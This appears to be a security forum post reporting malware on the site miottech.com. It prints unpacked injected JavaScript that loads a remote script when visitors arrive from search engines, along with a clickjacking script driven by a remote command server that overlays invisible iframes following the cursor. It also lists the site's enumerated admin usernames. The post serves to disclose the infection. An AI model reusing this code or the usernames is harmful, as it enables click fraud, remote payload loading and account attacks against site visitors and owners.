External link to malware?

Viruses and worms
1

Website security risk: http://toolbar.netcraft.com/site_report?url=http://miottech.com
See: http://killmalware.com/miottech.com/
Found: -http://goo.gl/P4YrUf going to http://www.domxssscanner.com/scan?url=http%3A%2F%2Fadahb.org%2Felements%2Finclude%2Fjquery-migrate.min.g.js
The un-packed code:

var x = document.referrer;
var f = x.search("facebook");
var g = x.search("google");
var m = x.search("bing");
var y = x.search("yahoo");
if (f > 0 || g > 0 || m > 0 || y > 0) {
	document.write("<script src='htxp://www.carrosport.net/dom/g1.js'><\/script>")
}

with unpacked code:

function myurl() {
	if (window.XMLHttpRequest) xmlhttp = new XMLHttpRequest();
	else xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
	var host = window.location.hostname;
	xmlhttp.open("GET", "http://speedclick.info/app/dom/controle/get_controle.php?cmd=geral&s=" + host, false);
	xmlhttp.send();
	hostipInfo = xmlhttp.responseText;
	return hostipInfo;
	return false
}
var linha = myurl();
var linha_array = linha.split("|");
var url = linha_array[0];
var tempo = linha_array[1];
var fechar = linha_array[2];
var cmd = linha_array[3];
var cmd_fechar = linha_array[4];
var qtd_iframe = linha_array[5];
if (cmd == 1) {
	function createCookie(name, value, days) {
		if (days) {
			var date = new Date();
			date.setTime(date.getTime() + (days * 24 * 60 * 60 * 1000));
			var expires = "; expires=" + date.toGMTString()
		} else var expires = "";
		document.cookie = name + "=" + value + expires + "; path=/"
	}
	function readCookie(name) {
		var nameEQ = name + "=";
		var ca = document.cookie.split(';');
		for (var i = 0; i < ca.length; i++) {
			var c = ca[i];
			while (c.charAt(0) == ' ') c = c.substring(1, c.length);
			if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length)
		}
		return null
	}
	function eraseCookie(name) {
		createCookie(name, "", -1)
	}
	var visited = readCookie('visited');
	if (!visited || visited !== "true") {
		createCookie('visited', "true", 1);
		document.write('<div id="subscribe" mobile="no">');
		document.write('<caralho>');
		document.write('<div id="position" style="position: absolute;z-index:999999;filter:alpha(opacity=0); opacity:0.0;">');
		document.write('<iframe style="border:none; overflow:hidden; width:310px; height:250px; " frameborder="0" scrolling="No" src="' + url + '" onclick="document.getElementByID("lightboxContent").style.display="none";"></iframe></div>');
		document.write('<div id="lightbox">');
		document.write('<iframe style="border:none; overflow:hidden; width:680px; height:50px; opacity:0; float:left;" frameborder="0" scrolling="No" src="' + url + '"></iframe>');
		document.write('<iframe style="border:none; overflow:hidden; width:680px; height:50px; opacity:0; float:left;" frameborder="0" scrolling="No" src="' + url + '"></iframe>');
		document.write('</div>');
		document.write('<div id="lightboxContent">');
		document.write('</div>');
		document.write('</caralho>');
		document.write('</div>');
		if (document.all) {} else document.captureEvents(Event.MOUSEMOVE);
		document.onmousemove = mouse
	}
}
function mouse(e) {
	if (navigator.appName == "Netscape") {
		xcurs = e.pageX;
		ycurs = e.pageY
	} else {
		xcurs = event.clientX;
		ycurs = event.clientY
	}
	document.getElementById("position").style.left = (xcurs - 160) + "px";
	document.getElementById("position").style.top = (ycurs - 60) + "px"
}
var clicado = 0;
var isOverIFrame = false;
function processMouseOut() {
	isOverIFrame = false;
	top.focus()
}
function processMouseOver() {
	isOverIFrame = true
}
function processIFrameClick() {
	if (isOverIFrame) {
		clicado = 1
	}
}
var element = document.getElementsByTagName("caralho");
for (var i = 0; i < element.length; i++) {
	element[i].onmouseover = processMouseOver;
	element[i].onmouseout = processMouseOut
}
if (typeof window.attachEvent != 'undefined') {
	top.attachEvent('onblur', processIFrameClick)
} else if (typeof window.addEventListener != 'undefined') {
	top.addEventListener('blur', processIFrameClick, false)
}
function contagemRegressiva() {
	if (clicado == 1) {
		setTimeout(function () {
			document.getElementById('subscribe').style.display = 'none'
		},
		2000)
	}
}
if (cmd_fechar == 1) {
	setInterval("contagemRegressiva()", fechar)
}
setTimeout(function () {
	document.getElementById('subscribe').style.display = 'none';
	document.getElementById('position').style.display = 'none'
},
tempo);

User Enumeration is possible
The first two user ID’s were tested to determine if user enumeration is possible.

ID User Login
1 admin admin
2 Fernando fernando

polonus